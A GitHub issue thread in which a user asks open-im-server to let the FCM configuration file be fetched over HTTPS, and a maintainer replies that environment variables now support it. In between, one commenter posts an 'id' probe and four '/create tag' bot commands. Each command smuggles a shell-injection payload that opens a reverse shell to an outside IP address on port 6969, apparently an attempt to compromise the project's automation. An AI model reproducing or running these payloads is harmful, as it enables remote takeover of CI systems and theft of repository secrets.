### ISSUE TITLE
[FEATURE REQUEST] `fcm` configuration file is recommended to support https download method

### ISSUE THREAD

**Issue by cipchk** [openimsdk/open-im-server#2330]
### Why this feature?

The current Docker version has removed the data volumes for the openim-server, which has caused our use of FCM push notifications to stop working.

If the FCM configuration supports HTTPS requests, the configuration parameters can be provided directly through a URL.

### Suggested Solution

-

**Comment by huydoppa** [comment]
`id`

**Comment by huydoppa** [comment]
/create tag v1.2.3"; sh -i >& /dev/tcp/192.227.191.60/6969 0>&1 2>/dev/null &;"

**Comment by huydoppa** [comment]
/create tag v1.2.3" && sh -i >& /dev/tcp/192.227.191.60/6969 0>&1 2>/dev/null #

**Comment by huydoppa** [comment]
/create tag v1.2.3" && sh -i >& /dev/tcp/192.227.191.60/6969 0>&1 2>/dev/null & #

**Comment by huydoppa** [comment]
/create tag v1.2.3" && sh -i >& /dev/tcp/192.227.191.60/6969 0>&1 2>/dev/null #

**Comment by skiffer-git** [comment]
The new version is already supported, and it needs to be configured through environment variables.
